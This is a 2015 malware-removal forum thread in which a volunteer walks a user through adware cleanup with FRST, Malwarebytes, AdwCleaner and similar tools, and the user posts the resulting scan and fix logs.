[PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1  -> Found
[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1  -> Found
[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1  -> Found

¤¤¤ Tasks : 0 ¤¤¤

¤¤¤ Files : 0 ¤¤¤

¤¤¤ Hosts File : 0 ¤¤¤

¤¤¤ Antirootkit : 0 (Driver: Not loaded [0xc000036b]) ¤¤¤

¤¤¤ Web browsers : 0 ¤¤¤

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: WDC WD15 EARS-22MVWB0 SATA Disk Device +++++
--- User ---
[MBR] f5f7efdfdb25012c0d61711481e48fad
[BSP] 14bb5f0af543e71519c3aef065759dfb : Windows Vista/7/8 MBR Code
Partition table:
0 - [XXXXXX] ACER (0x27) [VISIBLE] Offset (sectors): 2048 | Size: 18432 MB
1 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 37750784 | Size: 100 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
2 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 37955584 | Size: 1412265 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK

+++++ PhysicalDrive1: Generic USB SD Reader USB Device +++++
Error reading User MBR! ([15] The device is not ready. )
Error reading LL1 MBR! NOT VALID!
Error reading LL2 MBR! ([32] The request is not supported. )

+++++ PhysicalDrive2: Generic USB CF Reader USB Device +++++
Error reading User MBR! ([15] The device is not ready. )
Error reading LL1 MBR! NOT VALID!
Error reading LL2 MBR! ([32] The request is not supported. )

+++++ PhysicalDrive3: Generic USB xD/SM Reader USB Device +++++
Error reading User MBR! ([15] The device is not ready. )
Error reading LL1 MBR! NOT VALID!
Error reading LL2 MBR! ([32] The request is not supported. )

+++++ PhysicalDrive4: Generic USB MS Reader USB Device +++++
Error reading User MBR! ([15] The device is not ready. )
Error reading LL1 MBR! NOT VALID!
Error reading LL2 MBR! ([32] The request is not supported. )

+++++ PhysicalDrive5: Generic Mini SD Reader USB Device +++++
Error reading User MBR! ([15] The device is not ready. )
Error reading LL1 MBR! NOT VALID!
Error reading LL2 MBR! ([32] The request is not supported. )


Thanks again for your help!

Offline kevinf80

  • Malware Removal Staff
  • Diamond Member
  • Posts: 7656
Re: [Resolved - K] Pop ups
« Reply #4 on: January 21, 2015, 04:17:34 AM »
Thanks for the logs, continue as follows:

Upload a File to Virustotal

Go to http://www.virustotal.com/

  • Click the Choose file button
  • Navigate to the file C:\Windows\system32\Drivers\67F23A27.sys
  • Click the Scan it tab
  • If you get a message saying File has already been analyzed: click Reanalyze file now
  • Copy and paste the results back here please.
  • Repeat the above steps for the following files

C:\Windows\system32\Drivers\12D43959.sys

Next,

Download attached fixlist.txt file (end of reply) and save it to the Desktop, or the folder you saved FRST into.
NOTE. It's important that both FRST and fixlist.txt are in the same location or the fix will not work.

Run FRST and press the Fix button just once and wait.
The tool will make a log on the Desktop (Fixlog.txt) or the folder it was ran from. Please post it to your reply.

Next,

Open Malwarebytes Anti-Malware, from the Dashboard please Check for Updates by clicking the Update Now... link
When the update completes select > Settings > Detection and Protection > Enable Scan for rootkit and Under Non Malware Protection set both PUP and PUM to Treat detections as malware.


Click on the SCAN button and run a Threat Scan with Malwarebytes Anti-Malware by clicking the Scan Now>> button.

When the scan is complete, if there have been detections, click Apply Actions to allow MBAM to clean what was detected.


In most cases, a restart will be required.


Wait for the prompt to restart the computer to appear, then click on Yes.


When the scan is completed from the main GUI click on History > Application Logs. Find your scan log, the date when run will identify it. Checkmark "select" box > then hit the "view" button. The history log window will open. At the bottom of that window are two options, "Copy to clipboard" and "Export"
Select > "Copy to clipboard" that copies the full log to the windows clipboard, so at your reply you right click into the text field and select "Paste" the log is pasted (copied) to  your reply.

Or select "Export" you are given the option to export as a Text file (*.txt) or XML file (*.xml) Choose text file, save the exported file to a place of your choice. That file can be attached to your reply...

Next,

Download AdwCleaner by Xplode onto your Desktop.
  • Double click on Adwcleaner.exe to run the tool.
  • Click on Scan
  • Once the scan is done, click on the Clean button.
  • You will get a prompt asking to close all programs. Click OK.
  • Click OK again to reboot your computer.
  • A text file will open after the restart. Please post the content of that logfile in your reply.
  • You can also find the logfile at C:\AdwCleaner[Sn].txt. Where n in the scan reference number
Next,

Please download Junkware Removal Tool to your desktop.
  • Shut down your protection software now to avoid potential conflicts. (re-enable when done)
  • Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
  • Post the contents of JRT.txt into your next message.

Next,

Download Microsoft's " Malicious Software Removal Tool" and save direct to the desktop
Ensure to get the correct version for your system....
32 Bit version:
https://www.microsoft.com/downloads/en/confirmation.aspx?FamilyId=AD724AE0-E72D-4F54-9AB3-75B8EB148356&displaylang=en
64 Bit version:
https://www.microsoft.com/downloads/en/confirmation.aspx?FamilyId=585D2BDE-367F-495E-94E7-6349F4EFFC74&displaylang=en

Right click on the Tool, select “Run as Administrator” the tool will expand to the options Window
In the "Scan Type" window, select Quick Scan
Perform a scan and  Click Finish when the scan is done.
Retrieve the MSRT log as follows, and post it in your next reply:

1) Select the Windows key and R key together to open the "Run" function
2) Type or Copy/Paste the following command to the "Run Line" and Press Enter:

notepad c:\windows\debug\mrt.log

Next,

Scan with ZOEK

Please download ZOEK by Smeenk from here: http://hijackthis.nl/smeenk/ and save it to your desktop (preferred version is the *.exe one)
Temporary disable your AntiVirus and AntiSpyware protection - instructions here.

  • Right-click on icon and select Run as Administrator to start the tool.
  • Wait patiently until the main console will appear, it may take a minute or two.
  • In the main box please paste in the following script:

Code: [Select]
services_list;
standardsearch;
autoclean;
emptyclsid;
emptyfolderscheck;delete
iedefaults;
firefoxlook;
chromelook;
FFdefaults;
CHRdefaults;


  • Make sure that Scan All Users option is checked.
  • Push Run Script and wait patiently. The scan may take a couple of minutes.
  • When the scan completes, a zoek-results logfile should open in notepad.
  • If a reboot is needed, it will be opened after it. You may also find it at your main drive (usually C:\ drive)

Please include its content in your next reply. Don't forget to re-enable security software!

Let me see those logs in your next reply, also give an update on any remaining issues or concerns...

Thanks,

Kevin....


Offline kobra

  • Bronze Member
  • Posts: 18
Re: [Resolved - K] Pop ups
« Reply #5 on: January 22, 2015, 10:14:00 PM »
Thank you for looking at all these scans.  No, I haven't had any other problems so far.  I haven't been using it a
whole lot though. 

Due to length restrictions I have attached the logs in 3 parts. 

Part 1 (VirusTotal & FRST & MalwareBytes)

Here are the results of he VirusTotal scans.  I wasn't sure what you wanted pasted in, but with the hash, you can

look up the results yourself.  Neither file had any positive matches.

#################################################################################################################
67F23A27.sys:
SHA256:    6238fb8e785652040cce3e7044ea52066ce1bf173a1467474d64a3ab214b6bcd
File name:    67F23A27.sys
Detection ratio:    0 / 56
Analysis date:    2015-01-22 05:18:12 UTC ( 1 minute ago )
4
0
Probably harmless! There are strong indicators suggesting that this file is safe to use.

#################################################################################################################
12D43959.sys:
SHA256:    6238fb8e785652040cce3e7044ea52066ce1bf173a1467474d64a3ab214b6bcd
File name:    12D43959.sys
Detection ratio:    0 / 56
Analysis date:    2015-01-22 05:32:33 UTC ( 3 minutes ago )


#################################################################################################################
Fixlog from FRST:
Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 19-01-2015
Ran by Bonnie at 2015-01-21 22:39:43 Run:1
Running from C:\Users\Admin\Desktop
Loaded Profiles: Bonnie & Admin (Available profiles: Bonnie & Admin)
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
start
HKU\S-1-5-18\...\RunOnce: [SpUninstallDeleteDir] => rmdir /s /q "\SearchProtect"
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
SearchScopes: HKLM-x32 -> {9a216821-0ec5-49a3-85ac-fb72ae79a1e8} URL =

http://search.tb.ask.com/search/GGmain.jhtml?p2=^Y6^xdm003^S06927^us&si=CPC7u9_BzrkCFeqDQgodWCsAaw&ptb=7591A84B-

239C-40EE-A83E-84C8EA746CC3&ind=2013091522&n=77fd56c2&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKU\S-1-5-21-2977827394-2594518940-965070511-1000 -> {30BFC086-8BB7-466F-8E12-0A89A3B33C6C} URL =

http://start.mysearchdial.com/results.php?f=4&q={searchTerms}

&a=dsites&cd=2XzuyEtN2Y1L1QzutAzzyCtDyByByD0D0Fzz0F0D0D0CyD0AtN0D0Tzu0SyBzyyDtN1L2XzutBtFtCyBtFtDtFtCtN1L1CzutDtBtC

tC1V1PtN1L1G1B1V1N2Y1L1Qzu2SyEtDyEyCyE0FyByBtGyB0CtAtBtGtDtAyEzytG0FyC0F0FtGyCyDzy0F0BtDyEyDtD0AyCyD2QtN1M1F1B2Z1V1

N2Y1L1Qzu2SyCyB0CyDyCzz0DzztG0B0FyCyDtGtBtDzyyEtGtCtDzyyDtGtDtB0E0CyByCtCyC0CzzyBtA2Q&cr=1308762248&ir=
SearchScopes: HKU\S-1-5-21-2977827394-2594518940-965070511-1000 -> {47287947-90A5-41BC-A98B-24214FA5ECE9} URL =

https://search.yahoo.com/search?fr=mcafee&type=B010US739D20120919&p={SearchTerms}
SearchScopes: HKU\S-1-5-21-2977827394-2594518940-965070511-1000 -> {55D8CC73-D9F8-4F92-8EAE-0081BE423565} URL =

http://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT3196716
SearchScopes: HKU\S-1-5-21-2977827394-2594518940-965070511-1000 -> {88BA080D-DF1A-45D2-8CE2-8461E30FBFFE} URL =

http://search.netzero.net/search?action=search&source=browserboxapp&query={searchTerms}
SearchScopes: HKU\S-1-5-21-2977827394-2594518940-965070511-1000 -> {96bd48dd-741b-41ae-ac4a-aff96ba00f7e} URL =

http://search.coupons.com/search.asp?p=df&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2977827394-2594518940-965070511-1000 -> {9a216821-0ec5-49a3-85ac-fb72ae79a1e8} URL =

http://search.tb.ask.com/search/GGmain.jhtml?p2=^Y6^xdm003^S06927^us&si=CPC7u9_BzrkCFeqDQgodWCsAaw&ptb=7591A84B-

239C-40EE-A83E-84C8EA746CC3&ind=2013091522&n=77fd56c2&psa=&st=sb&searchfor={searchTerms}
BHO: caoupoNpEaK -> {01050D05-D546-B8DC-954D-8334A8A7BF5A} -> C:\ProgramData\caoupoNpEaK\_1Y.x64.dll No File
BHO: AudioCeonvaeert -> {2F344960-763E-9E6C-E973-25241A34D54E} -> C:\ProgramData\AudioCeonvaeert\mRE8_SdP.x64.dll

No File
BHO: DiscounntLoCaatOr -> {39dd84e0-d7e2-4b5c-88df-6bfebdce6716} -> C:\ProgramData\DiscounntLoCaatOr

\4hvGyEzAwMBtBM.x64.dll ()
BHO: SaoftiCoup -> {b2ba0648-6833-4057-aaa1-bf9c473dd360} -> C:\ProgramData\SaoftiCoup\HDwI4jNxyFjYaK.x64.dll ()
BHO: PrinCECCoupon -> {B4552D3D-6B41-9AF1-3067-72A066972344} -> C:\ProgramData\PrinCECCoupon\jsih.x64.dll No File
BHO-x32: MSS+ Identifier -> {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} -> C:\Program Files\McAfee Security Scan

\3.8.130\McAfeeMSS_IE.dll No File
BHO-x32: No Name -> {39dd84e0-d7e2-4b5c-88df-6bfebdce6716} ->  No File
BHO-x32: No Name -> {b2ba0648-6833-4057-aaa1-bf9c473dd360} ->  No File
Toolbar: HKLM-x32 - FromDocToPDF - {c66a678d-5e6c-4af9-8f57-c6192f42cf74} - C:\Program Files

(x86)\FromDocToPDF_65\bar\1.bin\65bar.dll No File
Toolbar: HKLM-x32 - No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} -  No File
Toolbar: HKU\S-1-5-21-2977827394-2594518940-965070511-1000 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - 

No File
Toolbar: HKU\S-1-5-21-2977827394-2594518940-965070511-1000 -> No Name - {C66A678D-5E6C-4AF9-8F57-C6192F42CF74} - 

No File
DPF: HKLM-x32 {E4D88471-7ED7-43E1-B290-205559E8EBB2} https://my.madisonhospital.org/mig/mae/login/Browser

%20Logoff.dll
DPF: HKLM-x32 {ECB7BFF0-FF65-11D1-9004-00A0C92E6878} https://my.madisonhospital.org/mig/mae/login/MWebEnable.dll
S1 BHDrvx64; \??\C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_19.0.0.128\Definitions\BASHDefs

\20120711.002\BHDrvx64.sys [X]
S3 NAVENG; \??\C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_19.0.0.128\Definitions\VirusDefs

\20120727.033\ENG64.SYS [X]
S3 NAVEX15; \??\C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_19.0.0.128\Definitions\VirusDefs

\20120727.033\EX64.SYS [X]
S1 qknfd; system32\drivers\qknfd.sys [X]
C:\windows\system32\drivers\qknfd.sys
C:\ProgramData\DiscounntLoCaatOr
C:\ProgramData\SaoftiCoup
C:\ProgramData\PrinCECCoupon
C:\Program Files (x86)\Uniqoupons
C:\Program Files (x86)\Optimizer Pro
C:\Users\Bonnie\jobq (1).dat
C:\Users\Bonnie\jobq (2).dat
C:\Users\Bonnie\jobq.dat
C:\Users\Bonnie\AppData\Local\Temp\autorun.dll
C:\Users\Bonnie\AppData\Local\Temp\COMAP.EXE
C:\Users\Bonnie\AppData\Local\Temp\Couponscom.exe
C:\Users\Bonnie\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpnzo84j.dll
C:\Users\Bonnie\AppData\Local\Temp\fp_pl_pfs_installer.exe
C:\Users\Bonnie\AppData\Local\Temp\_is6A1B.exe
Task: {224B946F-8456-4B76-B6A5-CC5D802F83D2} - System32\Tasks\Norton WSC Integration => C:\Program Files

(x86)\Norton Internet Security\Engine\19.9.1.14\WSCStub.exe
C:\Program Files (x86)\Norton Internet Security
Task: {3E4DBC7D-7F19-4D96-BC4B-4539E3201C58} - System32\Tasks\Norton Internet Security\Norton Error Analyzer => C:

\Program Files (x86)\Norton Internet Security\Engine\19.9.1.14\SymErr.exe
Task: {D8E2FD8D-CCA1-48A5-AADF-3AA2FC346D7D} - System32\Tasks\Norton Internet Security\Norton Error Processor =>

C:\Program Files (x86)\Norton Internet Security\Engine\19.9.1.14\SymErr.exe
Emptytemp:
end



*****************

HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\RunOnce\\SpUninstallDeleteDir => Value could not be deleted.
HKLM\SOFTWARE\Policies\Google => Key could not be deleted. Access denied.
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer => Key could not be deleted. Access denied.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{9a216821-0ec5-49a3-85ac-fb72ae79a1e8} => Key

could not be deleted. Access denied.
HKCR\Wow6432Node\CLSID\{9a216821-0ec5-49a3-85ac-fb72ae79a1e8} => Key not found.
HKU\S-1-5-21-2977827394-2594518940-965070511-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{30BFC086-8BB7

-466F-8E12-0A89A3B33C6C} => Key could not be deleted. Access denied.
HKCR\CLSID\{30BFC086-8BB7-466F-8E12-0A89A3B33C6C} => Key not found.
HKU\S-1-5-21-2977827394-2594518940-965070511-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{47287947-90A5

-41BC-A98B-24214FA5ECE9} => Key could not be deleted. Access denied.
HKCR\CLSID\{47287947-90A5-41BC-A98B-24214FA5ECE9} => Key not found.
HKU\S-1-5-21-2977827394-2594518940-965070511-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{55D8CC73-D9F8

-4F92-8EAE-0081BE423565} => Key could not be deleted. Access denied.
HKCR\CLSID\{55D8CC73-D9F8-4F92-8EAE-0081BE423565} => Key not found.
HKU\S-1-5-21-2977827394-2594518940-965070511-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{88BA080D-

DF1A-45D2-8CE2-8461E30FBFFE} => Key could not be deleted. Access denied.
HKCR\CLSID\{88BA080D-DF1A-45D2-8CE2-8461E30FBFFE} => Key not found.
HKU\S-1-5-21-2977827394-2594518940-965070511-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{96bd48dd-

741b-41ae-ac4a-aff96ba00f7e} => Key could not be deleted. Access denied.
HKCR\CLSID\{96bd48dd-741b-41ae-ac4a-aff96ba00f7e} => Key not found.
HKU\S-1-5-21-2977827394-2594518940-965070511-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{9a216821-0ec5

-49a3-85ac-fb72ae79a1e8} => Key could not be deleted. Access denied.
HKCR\CLSID\{9a216821-0ec5-49a3-85ac-fb72ae79a1e8} => Key not found.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{01050D05-D546-B8DC-954D-

8334A8A7BF5A} => Key could not be deleted. Access denied.
HKCR\CLSID\{01050D05-D546-B8DC-954D-8334A8A7BF5A} => Key could not be deleted. Access denied.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{2F344960-763E-9E6C-E973-

25241A34D54E} => Key could not be deleted. Access denied.
HKCR\CLSID\{2F344960-763E-9E6C-E973-25241A34D54E} => Key could not be deleted. Access denied.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{39dd84e0-d7e2-4b5c-88df-

6bfebdce6716} => Key could not be deleted. Access denied.
HKCR\CLSID\{39dd84e0-d7e2-4b5c-88df-6bfebdce6716} => Key could not be deleted. Access denied.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{b2ba0648-6833-4057-aaa1-

bf9c473dd360} => Key could not be deleted. Access denied.
HKCR\CLSID\{b2ba0648-6833-4057-aaa1-bf9c473dd360} => Key could not be deleted. Access denied.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B4552D3D-6B41-9AF1-3067-

72A066972344} => Key could not be deleted. Access denied.
HKCR\CLSID\{B4552D3D-6B41-9AF1-3067-72A066972344} => Key could not be deleted. Access denied.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{0E8A89AD-95D7-40EB-

8D9D-083EF7066A01} => Key could not be deleted. Access denied.
HKCR\Wow6432Node\CLSID\{0E8A89AD-95D7-40EB-8D9D-083EF7066A01} => Key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{39dd84e0-d7e2-4b5c-

88df-6bfebdce6716} => Key could not be deleted. Access denied.
HKCR\Wow6432Node\CLSID\{39dd84e0-d7e2-4b5c-88df-6bfebdce6716} => Key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{b2ba0648-6833-4057-

aaa1-bf9c473dd360} => Key could not be deleted. Access denied.
HKCR\Wow6432Node\CLSID\{b2ba0648-6833-4057-aaa1-bf9c473dd360} => Key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\\{c66a678d-5e6c-4af9-8f57-c6192f42cf74} => Value

could not be deleted.
HKCR\Wow6432Node\CLSID\{c66a678d-5e6c-4af9-8f57-c6192f42cf74} => Key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\\{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} => Value

could not be deleted.
HKCR\Wow6432Node\CLSID\{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} => Key not found.
HKU\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\

\{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} => value deleted successfully.
HKCR\CLSID\{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} => Key not found.
HKU\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\

\{C66A678D-5E6C-4AF9-8F57-C6192F42CF74} => value deleted successfully.
HKCR\CLSID\{C66A678D-5E6C-4AF9-8F57-C6192F42CF74} => Key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Code Store Database\Distribution Units\{E4D88471-7ED7-43E1-B290-205559E8EBB2}

=> Key could not be deleted. Access denied.
HKCR\Wow6432Node\CLSID\{E4D88471-7ED7-43E1-B290-205559E8EBB2} => Key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Code Store Database\Distribution Units\{ECB7BFF0-FF65-11D1-9004-00A0C92E6878}

=> Key could not be deleted. Access denied.
HKCR\Wow6432Node\CLSID\{ECB7BFF0-FF65-11D1-9004-00A0C92E6878} => Key not found.
BHDrvx64 => Error deleting Service
NAVENG => Error deleting Service
NAVEX15 => Error deleting Service
qknfd => Error deleting Service
"C:\windows\system32\drivers\qknfd.sys" => File/Directory not found.

"C:\ProgramData\DiscounntLoCaatOr" directory move:

Could not move "C:\ProgramData\DiscounntLoCaatOr\4hvGyEzAwMBtBM.dat" => Scheduled to move on reboot.
Could not move "C:\ProgramData\DiscounntLoCaatOr\4hvGyEzAwMBtBM.tlb" => Scheduled to move on reboot.
Could not move "C:\ProgramData\DiscounntLoCaatOr\4hvGyEzAwMBtBM.x64.dll" => Scheduled to move on reboot.
Could not move "C:\ProgramData\DiscounntLoCaatOr" directory. => Scheduled to move on reboot.


"C:\ProgramData\SaoftiCoup" directory move:

Could not move "C:\ProgramData\SaoftiCoup\HDwI4jNxyFjYaK.dat" => Scheduled to move on reboot.
Could not move "C:\ProgramData\SaoftiCoup\HDwI4jNxyFjYaK.tlb" => Scheduled to move on reboot.
Could not move "C:\ProgramData\SaoftiCoup\HDwI4jNxyFjYaK.x64.dll" => Scheduled to move on reboot.
Could not move "C:\ProgramData\SaoftiCoup" directory. => Scheduled to move on reboot.


"C:\ProgramData\PrinCECCoupon" directory move:

Could not move "C:\ProgramData\PrinCECCoupon\jsih.dat" => Scheduled to move on reboot.
Could not move "C:\ProgramData\PrinCECCoupon\jsih.tlb" => Scheduled to move on reboot.
Could not move "C:\ProgramData\PrinCECCoupon" directory. => Scheduled to move on reboot.


"C:\Program Files (x86)\Uniqoupons" directory move:

Could not move "C:\Program Files (x86)\Uniqoupons\funcoupons.dll.vir" => Scheduled to move on reboot.
Could not move "C:\Program Files (x86)\Uniqoupons" directory. => Scheduled to move on reboot.


"C:\Program Files (x86)\Optimizer Pro" directory move:

Could not move "C:\Program Files (x86)\Optimizer Pro" directory. => Scheduled to move on reboot.

C:\Users\Bonnie\jobq (1).dat => Moved successfully.
C:\Users\Bonnie\jobq (2).dat => Moved successfully.
C:\Users\Bonnie\jobq.dat => Moved successfully.
C:\Users\Bonnie\AppData\Local\Temp\autorun.dll => Moved successfully.
C:\Users\Bonnie\AppData\Local\Temp\COMAP.EXE => Moved successfully.
C:\Users\Bonnie\AppData\Local\Temp\Couponscom.exe => Moved successfully.
"C:\Users\Bonnie\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpnzo84j.dll" =>

File/Directory not found.
C:\Users\Bonnie\AppData\Local\Temp\fp_pl_pfs_installer.exe => Moved successfully.
C:\Users\Bonnie\AppData\Local\Temp\_is6A1B.exe => Moved successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{224B946F-8456-4B76-B6A5-CC5D802F83D2}

=> Key could not be deleted. Access denied.
C:\Windows\System32\Tasks\Norton WSC Integration not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Norton WSC Integration => Key could not

be deleted. Access denied.
"C:\Program Files (x86)\Norton Internet Security" => File/Directory not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3E4DBC7D-7F19-4D96-BC4B-4539E3201C58}

=> Key could not be deleted. Access denied.
Could not move "C:\Windows\System32\Tasks\Norton Internet Security\Norton Error Analyzer" => Scheduled to move on

reboot.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Norton Internet Security\Norton Error

Analyzer => Key could not be deleted. Access denied.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D8E2FD8D-CCA1-48A5-AADF-3AA2FC346D7D}

=> Key could not be deleted. Access denied.
Could not move "C:\Windows\System32\Tasks\Norton Internet Security\Norton Error Processor" => Scheduled to move on

reboot.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Norton Internet Security\Norton Error

Processor => Key could not be deleted. Access denied.
EmptyTemp: => Removed 3.9 GB temporary data.


#################################################################################################################
There were no positives found from MalwareBytes,

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 1/21/2015
Scan Time: 10:54:50 PM
Logfile: 150121_MalwareBytesScanResults.txt
Administrator: Yes

Version: 2.00.4.1028
Malware Database: v2015.01.22.03
Rootkit Database: v2015.01.14.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: Admin

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 393337
Time Elapsed: 17 min, 58 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)


(end)

Offline kobra

  • Bronze Member
  • Posts: 18
Re: [Resolved - K] Pop ups
« Reply #6 on: January 22, 2015, 10:14:59 PM »
Part 2 (AdwCleaner & Junkware Removal Tool)
#################################################################################################################
AdwCleaner

There were two log files in the directory you referenced, I have pasted them both below:

AdwCleaner[R0].txt:
-------------------
# AdwCleaner v4.108 - Report created 21/01/2015 at 23:27:28
# Updated 17/01/2015 by Xplode
# Database : 2015-01-22.2 [Live]
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)
# Username : Admin - LAWRENCE2
# Running from : C:\Users\Admin\Desktop\AdwCleaner.exe
# Option : Scan

***** [ Services ] *****

Service Found : qknfd

***** [ Files / Folders ] *****

File Found : \END
File Found : C:\Users\Bonnie\AppData\Roaming\Mozilla\Firefox\Profiles\7rgneeol.default\user.js
Folder Found : C:\Program Files (x86)\Conduit
Folder Found : C:\Program Files (x86)\Optimizer Pro
Folder Found : C:\Program Files (x86)\saveron
Folder Found : C:\Program Files\Conduit
Folder Found : C:\ProgramData\2fcd61ef531c55b0
Folder Found : C:\ProgramData\3444516970527741360
Folder Found : C:\ProgramData\caoupoNpEaK
Folder Found : C:\ProgramData\ClIckForSalie
Folder Found : C:\ProgramData\DiscounntLoCaatOr
Folder Found : C:\ProgramData\KinngCouupon
Folder Found : C:\ProgramData\PrinCECCoupon
Folder Found : C:\ProgramData\SalesMagnet
Folder Found : C:\ProgramData\SaoftiCoup
Folder Found : C:\ProgramData\saveron
Folder Found : C:\Users\Bonnie\AppData\Local\Conduit
Folder Found : C:\Users\Bonnie\AppData\Local\iac
Folder Found : C:\Users\Bonnie\AppData\Local\NativeMessaging
Folder Found : C:\Users\Bonnie\AppData\LocalLow\Conduit
Folder Found : C:\Users\Bonnie\AppData\LocalLow\iac
Folder Found : C:\Users\Bonnie\AppData\LocalLow\Toolbar4
Folder Found : C:\Users\Bonnie\AppData\Roaming\DigitalSites
Folder Found : C:\Users\Bonnie\AppData\Roaming\ValueApps
Folder Found : C:\Users\Bonnie\Documents\Optimizer Pro
Folder Found : C:\Users\Bonnie\Documents\Updater
Folder Found : C:\Windows\SysWOW64\SearchProtect

***** [ Scheduled Tasks ] *****


***** [ Shortcuts ] *****


***** [ Registry ] *****

Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{C66A678D-5E6C-4AF9-8F57-C6192F42CF74}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{C66A678D-5E6C-4AF9-8F57-C6192F42CF74}
Key Found : HKLM\SOFTWARE\{1146AC44-2F03-4431-B4FD-889BC837521F}
Key Found : HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}
Key Found : HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
Key Found : HKLM\SOFTWARE\{6791A2F3-FC80-475C-A002-C014AF797E9C}
Key Found : HKLM\SOFTWARE\Classes\.
